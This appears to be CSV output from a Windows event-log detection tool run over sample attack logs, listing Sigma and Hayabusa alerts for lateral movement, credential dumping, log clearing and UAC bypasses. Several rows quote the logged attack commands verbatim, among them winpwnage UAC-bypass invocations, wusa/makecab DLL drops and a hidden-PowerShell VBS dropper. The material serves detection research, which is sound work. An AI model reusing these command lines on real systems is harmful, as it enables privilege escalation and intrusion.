\\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe 
-Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: 
C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx -2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx -2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: 
student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx -2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx -2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx -2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx -2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: 
?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx -2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : 
User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 
11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx -2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx -2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx -2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx -2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx -2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:13.494 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx -2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 